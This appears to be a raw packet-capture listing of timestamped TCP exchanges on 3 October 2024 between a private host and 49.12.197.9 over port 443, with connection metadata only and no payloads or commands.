                                                                                                                                                                  Oct 3, 2024 03:36:13.456553936 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.487329006 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.487360001 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.487472057 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.487479925 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.487550974 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.506639004 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.506659031 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.506737947 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.506746054 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.506783009 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.527812958 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.527829885 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.527899027 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.527908087 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.527952909 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.542884111 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.542901039 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.542982101 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.542994976 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.546267033 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.557945967 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.557976961 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.558058977 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.558068991 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.558109999 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.575500965 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.575524092 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.575579882 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.575588942 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.575622082 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.575640917 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.589325905 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.589344025 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.589378119 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.589385986 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.589437008 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.604687929 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.604706049 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.604775906 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.604784966 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.604820967 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.616348028 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.616364002 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.616446018 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.616453886 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.616493940 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.625413895 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.625431061 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.625520945 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.625529051 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.626569986 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.635394096 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.635413885 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.635488987 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.635497093 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.638582945 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.644546032 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.644561052 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.644620895 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.644629955 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.646583080 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.651783943 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.651808023 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.651845932 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.651854038 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.651904106 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.662234068 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.662256956 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.662347078 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.662379980 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.662569046 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.681565046 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.681585073 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.681673050 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.681689024 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.681729078 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.696966887 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.696985006 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.697053909 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.697067022 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.698577881 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.708726883 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.708744049 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.708827972 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.708867073 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.710580111 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.717674971 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.717705011 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.717762947 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.717792988 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.717809916 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.717835903 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.727646112 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.727668047 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.727763891 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.727782011 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.729270935 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.735569954 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.735590935 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.735671043 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.735687017 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.735717058 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.735733986 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.744019985 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.744044065 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.744115114 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.744129896 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.744147062 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.744170904 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.760560989 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.760587931 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.760698080 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.760720968 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.760762930 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.789370060 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.789467096 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:13.789472103 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.789525032 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.832833052 CEST49735443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:13.832878113 CEST4434973549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:14.092621088 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:14.092684984 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:14.092784882 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:14.093069077 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:14.093086958 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:14.763248920 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:14.763413906 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:14.763900995 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:14.763911963 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:14.765861988 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:14.765876055 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.197571993 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.197638988 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.197683096 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.197856903 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.197856903 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.197858095 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.197931051 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.197988987 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.228424072 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.228447914 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.228580952 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.228595972 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.228637934 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.295402050 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.295429945 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.295561075 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.295577049 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.295614004 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.325114012 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.325136900 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.325270891 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.325284004 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.325331926 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.363176107 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.363197088 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.363274097 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.363285065 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.363320112 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.394051075 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.394083023 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.394190073 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.394203901 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.394247055 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.412800074 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.412864923 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.413021088 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.413037062 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.413100958 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.430505991 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.430555105 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.430598021 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.430613995 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.430643082 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.430656910 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.448077917 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.448096991 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.448174000 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.448189020 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.448236942 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.462652922 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.462717056 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.462788105 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.462805033 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.462836981 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.462857008 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.479578018 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.479615927 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.479734898 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.479749918 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.479803085 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.493094921 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.493118048 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.493216038 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.493221045 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.493263960 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.509238958 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.509263992 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.509327888 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.509332895 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.509533882 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.528811932 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.528839111 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.528889894 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.528894901 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.528932095 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.530164003 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.530183077 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.530222893 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.530226946 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.530246019 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.530261993 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.536753893 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.536787033 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.536833048 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.536837101 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.536870956 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.536870956 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.536907911 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.537553072 CEST49736443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.537565947 CEST4434973649.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.539004087 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.539112091 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:15.539217949 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.539552927 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:15.539585114 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.183451891 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.183576107 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.276150942 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.276177883 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.301470041 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.301486015 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.612782955 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.612813950 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.612834930 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.612890005 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.612960100 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.612989902 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.613070011 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.643974066 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.644012928 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.644124031 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.644144058 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.644184113 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.710932970 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.710963964 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.711206913 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.711242914 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.711394072 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.740617990 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.740650892 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.740880966 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.740915060 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.740969896 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.778583050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.778669119 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.778702021 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:16.778773069 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.778810978 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.779053926 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:16.779078960 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:17.029017925 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:17.029071093 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:17.029155016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:17.029387951 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:17.029407978 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:17.668535948 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:17.668662071 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:17.669215918 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:17.669228077 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:17.670898914 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:17.670905113 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.096803904 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.096833944 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.096849918 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.096879959 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.096910954 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.096923113 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.096965075 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.126857996 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.126877069 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.126955986 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.126976013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.127012968 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.192399025 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.192418098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.192518950 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.192533970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.192573071 CEST49738443192.168.2.649.12.197.9
